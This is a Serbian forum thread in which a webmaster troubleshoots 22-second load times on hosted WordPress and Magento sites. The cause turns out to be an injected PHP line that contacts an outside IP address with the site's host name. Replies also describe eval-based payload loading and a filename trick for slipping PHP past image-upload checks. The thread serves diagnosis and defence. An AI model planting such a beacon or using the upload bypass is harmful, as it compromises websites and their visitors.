Spori sajtovi - Kako dijagnostikovati razlog

[ anon70939 @ 09.12.2016. 11:39 ] @

Imamo kod jednog hosting provajdera nasih desetak sajtova.
Oni inace imaju neki esxi server na Hetzneru, i pruzaju nam uslugu hostinga na toj jednoj VM kojoj nemam pristup.

Od juce ti sajtovi radi jako sporo. preko 20 sekundi se ceka pre nego sto downloaduje sav sadrzaj, i onda to odradi za manje od sekund.

Ovo je jedan deo rezultata sa Pingdom. "Wait" status je skoro 22 sec, i onda skine sadrzaj za 24ms.

Cak imam i jedan sajt gde je samo Hello! na stranici

Posumnjao sam do servera, i pisao ovom hostingu, ali mi odgovaraju da su restartovali servise, i da nema nikakvog load-a na serveru, da nije do servera.
Inace jedan sajt od tih 10 radi kako treba...

I uzeo sam jedan od primera (obican WP sajt sa par stranica) i postavio ga na neki nas server, i tu jednako sporo otvara. Server je isto hetznerov, ali dedicated i imam full pristup.
Tom sajtu sam i disejblovao sve pluginove i nista bolje.

Ne znam kojim putem da idem da dijagnostikujem sta moze biti problem.
Uzeo sam taj Pingdom tool, ali nije problem do fajlova. I taj Wait status od 22 sekunde, mi onako laicki zvucalo da moze biti problem sa konekcijom ka serveru. Ali na ovom nasem dev serveru na koji sam prebacio sajt zbog testa, svi ostali sajtovi rade bez problema.

E da. Kad se ulogujem u admin panel ovog WP sajta, radi sve kako treba.
Posumnjao bih ja da je WP ili neki plugin, ali identicno se ponasa i jedan sajt koji je Magento. Dakle nema sanse da ima isti plugin, ni content.

[ dejanet @ 09.12.2016. 12:18 ] @

Da li je slican wait (22 sec), kada drugi put testiras ?

Pada mi na pamet, da je web app recycled, odnosno da nije ucitana jer se malo koristi, pa kada naletis prvi, onda server ucitava, inicijalizuje, kompajlira....

[ anon70939 @ 09.12.2016. 13:00 ] @

svi sajtovi skoro tacno 22 sekunde. I to traje vec 2 dana

[ anon115774 @ 10.12.2016. 12:00 ] @

Jel se to desava i sa drugih lokacija?

Daj ip adresu tog servera i adresu web aplikacije (ako ne zelis ovde baci na pp) pa da probam da testiram. Imam nekoliko ideja...

[ anon70939 @ 16.12.2016. 09:47 ] @

Hvala Informer na pomoći:)

Ajd da napišem i ovde, možda nekog gugl navede na ovu stranicu pa pomogne.

Problem je bio sto su nam nekako u index stranice ubacili sledeće

Code:
<?php file_get_contents("http://185.86.150.37/info.php?h=".urlencode($_SERVER["HTTP_HOST"])); ?>

I to je zapucavalo tih 22 sec.

[ jablan @ 16.12.2016. 21:39 ] @

Citat:

CoyoteKG:
Cak imam i jedan sajt gde je samo Hello! na stranici

Citat:

CoyoteKG:
Problem je bio sto su nam nekako u index stranice ubacili sledeće

Code:
<?php file_get_contents("http://185.86.150.37/info.php?h=".urlencode($_SERVER["HTTP_HOST"])); ?>

???

[ anon70939 @ 16.12.2016. 22:49 ] @

Pored nekoliko php sajtova, odnosno index.php stranica, bilo je i nekoliko HTML stranica, kao recimo ta gde je bilo samo Hello. Samo sto u njima nije bila ova php komanda nego neka <script>, ne secam se tacno komande, ali takodje je bila ova IP adresa u tim script tagovima.

Je l' ti to nije jasno, ili...?

[ whitie2004 @ 17.12.2016. 09:58 ] @

Niste imali u konzoli brouzera ono:

Code:
... [function.file-get-contents]: failed to open stream: Connection timed out in ...

[ Aleksandar Đokić @ 17.12.2016. 16:50 ] @

Obicno sa injektovani file-get-contents skinu payload za malware skriptu, i obicno je enkriptovan i sadrzi eval() koji pokrece izvrsavanje.

[ anon70939 @ 17.12.2016. 23:29 ] @

Nismo imali ništa u konzoli, valjda. Cimao sam kolegu da proveri što je sporo, gledao je u konzoli ali nije našao. Imao je samo taj wait time od 22sec kao što pingdom pokazuje.

Vratili smo nazad backup, pošto su to uglavnom sajtovi koji se retko azuriraju.
Skeniracu da vidim da li u nekom fajlu postoji eval()

Ali mene više brine kako je injectovano to u fajlove... Neverovatno mi je da je neko skontao šifru, jer svuda gde stavljam šifre, različite su i koristim http://passwordsgenerator.net/. 16 kojekakvih karaktera...

Iscimao sam ga za fail2ban da postavi, rekao mi je da je bio instaliran ali da nije primetio da ne radi. I dodao je za magento site jail, ili podesio regex kako on kaze, sta god da je to.

Nakon toga poslao mi ovu poruku koju baš i ne razumem

Citat:

The test works fine:
Date template hits:
0 hit(s): MONTH Day Hour:Minute:Second
0 hit(s): WEEKDAY MONTH Day Hour:Minute:Second Year
0 hit(s): WEEKDAY MONTH Day Hour:Minute:Second
0 hit(s): Year/Month/Day Hour:Minute:Second
0 hit(s): Day/Month/Year Hour:Minute:Second
0 hit(s): Day/Month/Year Hour:Minute:Second
145315 hit(s): Day/MONTH/Year:Hour:Minute:Second
0 hit(s): Month/Day/Year:Hour:Minute:Second
0 hit(s): Year-Month-Day Hour:Minute:Second
0 hit(s): Day-MONTH-Year Hour:Minute:Second[.Millisecond]
0 hit(s): Day-Month-Year Hour:Minute:Second
0 hit(s): TAI64N
0 hit(s): Epoch
0 hit(s): ISO 8601
0 hit(s): Hour:Minute:Second
0 hit(s): <Month/Day/[email protected]:Minute:Second>

Success, the total number of match is 967

However, look at the above section 'Running tests' which could contain important
information.

[ Aleksandar Đokić @ 18.12.2016. 20:56 ] @

Citat:

kako je injectovano to u fajlove

Preko rupa u CMS-u. Na primer imas na sajtu opciju za upload nekih slika, i umesto slike uploaduju .php kod tako sto zaobidju provere u skipti. Ako se dobro secam jedan od nacina je stavis naziv fajla koji sadrzi php kod slika.php;.jpg, i kad skripta proverava vidi da je .jpg i dozvoli upload, a kad Linux snima fajl obrise sve do ';' i snimi kao slika.php, i onda to mozes da pokrenes kao bilo koji drugi php kod.

Ovo je samo jedan primer. Svaki dan nadju nesto novo - zato i radimo update, ne?